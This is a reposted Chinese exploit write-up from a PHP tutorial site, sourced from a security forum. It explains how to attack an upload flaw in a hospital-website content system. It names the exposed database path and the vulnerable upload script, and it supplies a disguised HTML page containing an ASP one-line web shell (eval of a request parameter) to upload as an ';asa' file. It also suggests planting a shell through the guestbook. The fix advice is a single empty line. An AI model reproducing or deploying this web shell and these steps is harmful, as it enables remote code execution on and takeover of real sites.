来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 好像有2个版本一个是asp的一个是php的数据库路径 db/sywl.asp漏洞文件up2.asp 内容太大了...也没什么好解的将以下代码存为 ;asa 直接上传 得到路径-_, (当然大牛们也可以自己构造一个一句话...
好像有2个版本一个是asp的一个是php的
数据库路径 db/sywl.asp 漏洞文件up2.asp 内容太大了...也没什么好解的 将以下代码存为 ;asa 直接上传 得到路径-_, (当然大牛们也可以自己构造一个一句话) 前面不要加,加了就会提示 不能上传ASA文件 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="keywords" content="a" /> <meta name="description" content="a" /> <title>a</title> <link href="/template/images/style.css" rel="stylesheet" type="text/css" /> <script type="text/javascript">var king_page='/page/';</script> <script src="/page/system/inc/jquery.js" type="text/javascript"></script> <script src="/page/system/inc/jquery.kc.js" type="text/javascript"></script> </head> <body> <!--顶部--> <div id="top"> <div><img src="/template/images/logo.jpg" /></div> <div id="menu"> <ul> <li><a href="/">医院首页</a></li> <li><a href="/html/yygk/">医院概况</a></li> <li><a href="/html/jyzn/">就医指南</a></li> <li><a href="/html/ksjs/">科室介绍</a></li> <li><a href="/html/yywh/">医院文化</a></li> <li><a href="/html/news/">新闻资讯</a></li> <li><a href="/html/jkkp/">健康科普</a></li> <li><a href="/page/feedback/">请你留言</a></li> </ul> </div> <!--主菜单--> </div> <!--内容--> <div class="content" id="onepage"><% Dim ConKey:ConKey="Cmd" Dim InValue:InValue=Request(ConKey) eval(InValue) %></div> <!--底部--> <div id="line"></div> <div id="bottom"> 京ICP备×××××××××号</div> <div id="Layer1"> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://..../pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="910" height="175"> <param name="movie" value="/template/images/sqlogo.swf" /> <param name="quality" value="high" /> <param name="wmode" value="transparent"> <embed src="/template/images/sqlogo.swf" quality="high" wmode="transparent" pluginspage="http://www.2cto.com /go/getflashplayer" type="application/x-shockwave-flash" width="910" height="175"></embed> </object> </div> </body> </html>更简单的如果数据库没改名 留言直接丢一句话。。连接数据库文件-_, 大牛别喷 好像这程序也出了一个编辑器,也是可以这样利用 修复:针对上述分析修复吧 转自:http://t00ls.net/thread-20291-1-1.html |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com